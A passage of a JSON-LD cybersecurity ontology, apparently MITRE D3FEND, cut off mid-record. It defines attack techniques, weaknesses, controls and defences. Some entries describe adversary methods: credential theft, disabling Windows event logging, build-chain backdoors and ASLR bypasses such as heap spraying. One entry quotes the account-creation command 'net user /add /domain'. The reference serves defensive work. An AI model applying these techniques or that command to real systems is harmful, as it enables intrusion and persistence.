      "d3f:definition": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Trusted Relationship",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N61967686f2704f9e93ffeb47e6f2f2b6"
        },
        {
          "@id": "_:Nb870d50782714559aa8c4e96f9a68fae"
        }
      ]
    },
    {
      "@id": "_:N61967686f2704f9e93ffeb47e6f2f2b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoginSession"
      }
    },
    {
      "@id": "_:Nb870d50782714559aa8c4e96f9a68fae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002463_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides data origin artifacts for internal name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002463"
    },
    {
      "@id": "d3f:CCI-001555_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies destination domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001555"
    },
    {
      "@id": "d3f:IA-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.01",
      "d3f:definition": "This technique targets what developers import and the tools that transform source into flight binaries. Methods include dependency confusion and typosquatting, poisoned container/base images, malicious IDE plugins, and compromised compilers, linkers, or build runners that subtly alter output. Because flight and ground stacks frequently reuse open-source RTOS components, crypto libraries, protocol parsers, and build scripts, an upstream change can deterministically reproduce a backdoor downstream. Attackers also seed private mirrors or caches so “trust-on-first-use” locks in tainted packages, or abuse CI secrets and environment variables to pivot further. Effects range from inserting covert handlers into command parsers, to weakening integrity checks in update paths, to embedding telemetry beacons that exfiltrate build metadata helpful for later stages.",
      "rdfs:label": "Software Dependencies & Development Tools - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Software Dependencies & Development Tools"
    },
    {
      "@id": "d3f:CWE-1071",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1071",
      "d3f:definition": "The source code contains a block that does not contain any code, i.e., the block is empty.",
      "rdfs:label": "Empty Code Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1555.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.004",
      "d3f:definition": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)",
      "rdfs:label": "Windows Credential Manager",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:T1048.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.001",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:N75c44c63115b414092e8b4379abbe533"
        }
      ]
    },
    {
      "@id": "_:N75c44c63115b414092e8b4379abbe533",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001233_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms on an organization-defined frequency to determine the state of information system components with regard to flaw remediation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001233"
    },
    {
      "@id": "d3f:T1151",
      "@type": "owl:Class",
      "d3f:attack-id": "T1151",
      "d3f:definition": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to \"evil.txt \" (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1036.006",
      "rdfs:label": "Space after Filename",
      "rdfs:seeAlso": {
        "@id": "d3f:T1036.006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:TA0110",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Persistence - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:T1562.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.002",
      "d3f:definition": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        }
      ],
      "rdfs:label": "Disable Windows Event Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N835ee4c803d24d579e67e0003ad576d8"
        },
        {
          "@id": "_:N08a3625482654880b0ccc85aaf17e232"
        }
      ]
    },
    {
      "@id": "_:N835ee4c803d24d579e67e0003ad576d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N08a3625482654880b0ccc85aaf17e232",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      }
    },
    {
      "@id": "d3f:UseCaseGoal",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Goal",
      "rdfs:subClassOf": {
        "@id": "d3f:Goal"
      }
    },
    {
      "@id": "d3f:CWE-1079",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1079",
      "d3f:definition": "A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.",
      "rdfs:label": "Parent Class without Virtual Destructor Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:AML.T0048.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.004",
      "d3f:definition": "Adversaries may exfiltrate AI artifacts to steal intellectual property and cause economic harm to the victim organization.\n\nProprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft.\n\nAIaaS providers charge for use of their API.\nAn adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract AI Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.",
      "rdfs:label": "AI Intellectual Property Theft - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "AI Intellectual Property Theft"
    },
    {
      "@id": "d3f:EXF-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0009",
      "d3f:definition": "The adversary leverages third-party infrastructure connected to the mission, commercial ground stations, relay networks, operations service providers, data processing partners, to capture or relay mission data outside official channels. From these footholds, the attacker can mirror TT&C and payload feeds, scrape shared repositories, and man-in-the-middle cross-organization links (e.g., between partner stations and the primary MOC). Because partner environments vary in segmentation and monitoring, exfiltration can affect multiple missions or operators simultaneously, with stolen data exiting through the partner’s routine distribution mechanisms.",
      "rdfs:label": "Compromised Partner Site - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Partner Site"
    },
    {
      "@id": "d3f:CWE-1122",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1122",
      "d3f:definition": "The code is structured in a way that a Halstead complexity measure exceeds a desirable maximum.",
      "rdfs:label": "Excessive Halstead Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1136.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.002",
      "d3f:creates": {
        "@id": "d3f:DomainUserAccount"
      },
      "d3f:definition": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.(Citation: Savill 1999)",
      "rdfs:label": "Domain Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N312b867064fb474bb0abed1112a85198"
        }
      ]
    },
    {
      "@id": "_:N312b867064fb474bb0abed1112a85198",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002690_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system distributes indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002690"
    },
    {
      "@id": "d3f:CWE-830",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-830",
      "d3f:definition": "The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source.",
      "rdfs:label": "Inclusion of Web Functionality from an Untrusted Source",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-829"
      }
    },
    {
      "@id": "d3f:M1015",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1015 scope is broad, touches on an wide variety of techniques in D3FEND.",
      "d3f:related": [
        {
          "@id": "d3f:AuthenticationCacheInvalidation"
        },
        {
          "@id": "d3f:DomainTrustPolicy"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "rdfs:label": "Active Directory Configuration"
    },
    {
      "@id": "d3f:T0800",
      "@type": "owl:Class",
      "d3f:attack-id": "T0800",
      "d3f:definition": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.",
      "rdfs:label": "Activate Firmware Update Mode - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Activate Firmware Update Mode"
    },
    {
      "@id": "d3f:T1546.016",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.016",
      "d3f:definition": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)",
      "rdfs:label": "Installer Packages",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:FileHashing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileHashing"
      ],
      "d3f:d3fend-id": "D3-FH",
      "d3f:definition": "Employing file hash comparisons to detect known malware.",
      "d3f:kb-article": "## How it works\nThis technique requires a list of hashes to compare a file against.\n\n## Considerations\nPerformance on large files or very large numbers of files.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Munin"
      },
      "rdfs:label": "File Hashing",
      "rdfs:subClassOf": {
        "@id": "d3f:FileAnalysis"
      }
    },
    {
      "@id": "d3f:LinuxELFFile64bit",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "Linux ELF File 64bit"
    },
    {
      "@id": "d3f:SegmentAddressOffsetRandomization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SegmentAddressOffsetRandomization"
      ],
      "d3f:d3fend-id": "D3-SAOR",
      "d3f:definition": "Randomizing the base (start) address of one or more segments of memory during the initialization of a process.",
      "d3f:kb-article": "## How it works\n\nMany application exploits rely on an attacker specifying a location in memory, which points to data or code used by the attacker.  If the addresses are changed each time the program is run, then it becomes more difficult for the attacker to determine the location that will contain the code they wish to run.\n\nImported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as \"rebasing.\"  Just as not all code is built for participation in ASLR, not all modules can be rebased; instead, modules must indicate whether they implement support for rebasing.  Such information to relocate the executable is typically stored in the \".reloc\" segment -- each of the addresses pointed to in this segment has its address increased by the amount of the offset.\n(An alternative method for relocation would be to add an amount to a global variable each time -- leading to less overhead in the module load, but more for each access.  Still another implementation could instead contain code to deference each changeable memory location on the fly, so that each of the references do not need to be updated.\n\n\n## Considerations\n\nAs the offset for each segment is constant, it is possible to guess at the value of the address given the address of another variable.  Alternatively, memory pointers may be kept around, which contain the address of another variable.\nAnother bypass technique is known as an \"egg hunt,\" whereby the attacker searches for a rather unique piece of the data or code in memory to determine its likely address.\n\nThe program needs to store these addresses for the functions somewhere.  In Linux, the PLT contains a \"trampoline\" to these addresses.  If an attacker desires to jump to the start of an existing function, they can jump directly to the trampoline anyway, and may have the opportunity to provide their own stack frame to the function with a write to the stack. If they overwrite a saved stack pointer which is loaded back into memory, or execute a function, that changes the address of a stack pointer.\n\nIf an attacker wants to inject some data into the program, for example as a parameter to a known function that is not under ASLR or a pointer to a trampoline function in the PLT, then they can repeat the data until they exceed the range of ASLR coverage, which on 32-bit systems is accomplishable in a few seconds with a heap spray.  Microsoft's EMET and Windows 10 Exploit Guard can pre-allocate particular addresses that are commonly used in heap sprays.  However, in many products, there does not seem to be nearly a complete coverage of such addresses, which only need to be executable and in the range of the heap; 0x0c0c0c0c is such an address that is commonly used for the x86 processor architecture, as when executed it only performs a numeric operation to a register four times.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DYNAMICBASE_UseAddressSpaceLayoutRandomization_MicrosoftDocs"
        },
        {
          "@id": "d3f:Reference-HowASLRProtectsLinuxSystemsFromBufferOverflowAttacks_NetworkWorld"
        }
      ],
      "d3f:obfuscates": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:synonym": [
        "ASLR",
        "Address Space Layout Randomization"
      ],
      "rdfs:label": "Segment Address Offset Randomization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:Nac67f6215d8b4fe890bdab18721ef6b9"
        }
      ]
    },
    {
      "@id": "_:Nac67f6215d8b4fe890bdab18721ef6b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:obfuscates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:resume",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x resume y: The agent or technique x continues a previous action on entity y. Usually occurs after suspension on y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00350758-v"
      },
      "rdfs:label": "resume",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:CCI-002743_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements spam protection mechanisms with a learning capability to more effectively identify legitimate communications traffic.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002743"
    },
    {
      "@id": "d3f:CCI-002403_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system only allows incoming communications from organization-defined authorized sources routed to organization-defined authorized destinations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002403"
    },
    {
      "@id": "d3f:T1406.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406.001",
      "d3f:definition": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.",
      "rdfs:label": "Steganography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1406"
      },
      "skos:prefLabel": "Steganography"
    },
    {
      "@id": "d3f:WindowsRegistryValueEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events representing actions performed on Windows Registry values, which store configuration data within registry keys.",
      "rdfs:label": "Windows Registry Value Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/win/registry_value_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryEvent"
        },
        {
          "@id": "_:Nd2f6070c8ac540438ffbb2e5a341302b"
        }
      ]
    },
    {
      "@id": "_:Nd2f6070c8ac540438ffbb2e5a341302b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValue"
      }
    },
    {
      "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ic3.gov/CSA/2022/220325.pdf"
      },
      "d3f:kb-abstract": "The FBI is warning that the group responsible for the deployment of TRITON malware against a Middle East-based petrochemical plant's safety instrumented system in 2017, the Russian Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM), continues to conduct activity targeting the global energy sector. This warning follows the 24 March 2022 unsealing of a US indictment of a Russian national and TsNIIkhM employee involved in that attack. TRITON was malware designed to cause physical safety systems to cease operating or to operate in an unsafe manner. Its potential impact could be similar to cyberattacks previously attributed to Russia that caused blackouts in Ukraine in 2015 and 2016.\n\n TRITON malware targeted the Schneider Electric Triconex safety instrumented system (SIS), which is used to initiate safe shutdown procedures in the event of an emergency. TRITON malware affected Triconex Tricon safety controllers by modifying in-memory firmware to add additional programming, potentially leading to damage of a facility, system downtime, and even loss of life should the SIS fail to initiate safe shutdown procedures. Schneider Electric addressed the vulnerability (with the Tricon model 3008 v10.0-10.4) when version 11.3 of the Tricon controller was released in June 2018; however, older versions of the controller remain in use and are vulnerable to a similar attack. As a result, the FBI is alerting the ICS community of continued activity by this group and requests that any indicators of potential compromise be reported to the FBI. ",
      "d3f:kb-author": "FBI",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:OperatingModeMonitoring"
        },
        {
          "@id": "d3f:OperatingModeRestriction"
        }
      ],
      "d3f:kb-reference-title": "TRITON Malware Remains Threat to Global Critical Infrastructure Industrial Control Systems (ICS)",
      "rdfs:label": "Reference - TRITON Malware Remains Threat to Global Critical Infrastructure Industrial Control Systems (ICS)"
    },
    {
      "@id": "d3f:has-contribution",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-contribution",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:DataArtifactServer",
      "@type": "owl:Class",
      "d3f:definition": "A data artifact server provides access services to content in a content repository.  The content repository or content store is a database of digital content with an associated set of data management, search and access methods allowing application-independent access to the content, rather like a digital library, but with the ability to store and modify content in addition to searching and retrieving. The content repository acts as the storage engine for a larger application such as a content management system or a document management system, which adds a user interface on top of the repository's application programming interface.",
      "rdfs:label": "Data Artifact Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Content_repository"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ArtifactServer"
      }
    },
    {
      "@id": "d3f:RegOpenKeyExA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyExA"
    },
    {
      "@id": "d3f:MessageEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageEncryption"
      ],
      "d3f:d3fend-id": "D3-MENCR",
      "d3f:definition": "Encrypting a message body using a cryptographic key.",
      "d3f:encrypts": {
        "@id": "d3f:DigitalMessage"
      },
      "d3f:kb-article": "## How it works\n\n### Asymmetric Cryptography\nAsymmetric encryption is typically accomplished using public and private key certificates based on the X.509 standard. The sender encrypts messages using the recipient's public key and the receipt decrypts the message using their private key. Standards that can be used to implement user message encryption include S/MIME (Secure/Multipurpose Internet Mail Extensions) and PGP.\n\n### Symmetric Cryptography\nSymmetric encryption uses the same cryptographic key by both the sender and receiver to encrypt and decrypt a message. Asymmetric key exchange protocols such as Diffie-Hellman can be used to share the cryptographic key with the recipient. For synchronous or low-latency environments (like a message bus), a pre-shared or dynamically derived symmetric key is typically used to minimize computational overhead.\n\n## Considerations\n- Separate configuration settings to enable message encryption are often needed for each messenger client (e.g. webmail, desktop client, mobile).\n- Continuous monitoring to ensure private keys are not compromised and the certificate authority (CA) is trusted.\n- Secure transfer of private keys between multiple devices.\n- Encryption adds latency and increases CPU utilization; while negligible for user-to-user messages, it can be a critical factor for real-time bus systems.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1"
      },
      "rdfs:label": "Message Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageHardening"
        },
        {
          "@id": "_:N19cca0dcc3c44b40b6e568c7fc9f7e15"
        }
      ]
    },
    {
      "@id": "_:N19cca0dcc3c44b40b6e568c7fc9f7e15",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:LinuxMmap2",
      "@type": "owl:Class",
      "d3f:definition": "Map files or devices into memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/mmap2.2.html"
      },
      "rdfs:label": "Linux Mmap2",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:ObjectEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ObjectEviction"
      ],
      "d3f:d3fend-id": "D3-OE",
      "d3f:definition": "Terminate or remove an object from a host machine. This is the broadest class for object eviction.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "rdfs:label": "Object Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nf2213404610c4571a4d471bff909a004"
        }
      ]
    },
    {
      "@id": "_:Nf2213404610c4571a4d471bff909a004",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:OSAPIResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that resumes the execution of a paused, stopped, or suspended thread.",
      "d3f:invokes": {
        "@id": "d3f:ResumeThread"
      },
      "rdfs:label": "OS API Resume Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N19ff1e4cf49747ceb569ce76814dd665"
        }
      ]
    },
    {
      "@id": "_:N19ff1e4cf49747ceb569ce76814dd665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResumeThread"
      }
    },
    {
      "@id": "d3f:TunnelEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the establishment, usage, or termination of a network tunnel. Tunnels provide encapsulated communication pathways across various layers, enabling secure, isolated, or virtualized transport of data.",
      "rdfs:label": "Tunnel Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/tunnel_activity"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:CWE-1240",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1240",
      "d3f:definition": "To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.",
      "rdfs:label": "Use of a Cryptographic Primitive with a Risky Implementation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-327"
      }
    },
    {
      "@id": "d3f:ProcessStartFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A function creates a new computer process, usually by invoking a create process system call.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Process Start Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nd4ff69c0fe1f4fd8b237c5a828fcdb05"
        }
      ]
    },
    {
      "@id": "_:Nd4ff69c0fe1f4fd8b237c5a828fcdb05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-422",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-422",
      "d3f:definition": "The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.",
      "rdfs:label": "Unprotected Windows Messaging Channel ('Shatter')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-360"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:CWE-824",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-824",
      "d3f:definition": "The product accesses or uses a pointer that has not been initialized.",
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "Access of Uninitialized Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nfa0b422118fd4993b6976b083a91531d"
        }
      ]
    },
    {
      "@id": "_:Nfa0b422118fd4993b6976b083a91531d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-618",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-618",
